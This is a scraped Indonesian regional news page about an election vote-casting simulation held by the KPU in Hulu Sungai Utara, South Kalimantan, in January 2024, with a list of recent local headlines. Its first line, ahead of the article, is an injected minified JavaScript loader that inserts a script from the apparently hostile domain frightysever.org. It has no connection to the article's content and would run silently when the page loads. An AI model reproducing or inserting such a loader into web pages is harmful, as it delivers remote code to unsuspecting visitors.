(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Ikut Simulasi Pencoblosan Suara, Ini Kata Sekda HSU


KANALKALIMANTAN.COM, AMUNTAI – Sekertaris Daerah (Sekda) Kabupaten Hulu Sungai Utara (HSU) Adi Lesmana ikut berpartisipasi sebagai pemilih saat simulasi pemungutan dan penghitungan suara yang digelar Komisi Pemilihan Umum (KPU) Kabupaten HSU di Gedung Aneka Guna Amuntai, Rabu (31/1/2024).

Simulasi tersebut turut diikuti Ketua DPRD HSU, Forkopimda, Kepala Kesbangpol, Kantor Kemenag, Lapas Kelas II B Amuntai, Diskominfosandi HSU, awak media, camat, pengurus partai politik se Kabupeten HSU, anggota PPK serta PPS.

Sekda HSU Adi Lesmana, saat membuka kegiatan menilai simulasi ini sangat penting agar semua pihak dapat memahami tata cara pemungutan dan penghitungan suara dengan jelas dan akurat.

Baca juga: Kecewa APK Melanggar Tapi Tak Ditindak, Ini Dalih Bawaslu Banjarbaru

Adi berpesan agar pelaksanaan pemungutan suara pemilu nanti berjalan dengan aman, tertib damai dan lancar serta dilaksanakan secara profesional.

“Bagi para petugas Pemilu agar dapat bekerja dengan sebaik-baiknya, sosialisasi perlu ditingkatkan bagaimana cara pencoblosan dalam bilik suara nanti, ” katanya.

Ketua KPU HSU, Ihsan Rahmani menjelaskan bahwa simulasi pemungutan dan perhitungan suara ini di lakukan sebagai panduan bagi pemilih agar bisa mendapatkan informasi yang utuh terkait alur proses melaksanakan hak pilih di Tempat Pemungutan Suara (TPS).

Baca juga: Debat Kelima Capres 2024, Aksi Pamungkas Anies, Prabowo dan Ganjar Meraup Suara

Ia berharap, semua pihak dapat bekerjasama, Pemilu di Kabupaten HSU berjalan dengan lancar, aman, damai bersahabat, profesional, berintegritas dan berkualitas. Karena KPU sendiri dengan SDM yang terbatas sangat membutuhkan kerjasama dari pemerintah daerah, pengamanan dan lainnya.

“Kami meminta dukungan kepada pemerintah daerah, stakeholder, keamanan, Forkominda dan semua masyarakat Kabupaten HSU, pada tanggal 14 Februari 2024 bersama-sama ke TPS untuk menyuarakan aspirasi terkait perwakilan rakyat dan pemimpin kita yang akan datang,” imbaunya.

Adapun proses simulasi dimulai dari melakukan pendaftaran dan mendapatkan surat suara, menuju bilik suara untuk menyalurkan hak pilihnya untuk 5 surat suara memilih Presiden dan wakil presiden RI, DPR RI, DPD RI, DPRD Provinsi Kalsel serta DPRD Kabupaten. Terakhir memasukkan surat suara sesuai dengan sampul warna surat suara dengan kotak suara.

Baca juga: Aisyiyah HSU Mendorong Kaum Hawa Kawal Demokrasi

Untuk pemilih yang sedang hamil dan lansia diprioritaskan terlebih dahulu, dan pemilih yang sakit nanti akan didatangi perwakilan KPPS beserta saksi untuk menggunakan hak pilih di rumah.(Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Muhammad Andi

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

2 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

2 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

2 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

3 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

3 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

3 jam ago

This website uses cookies.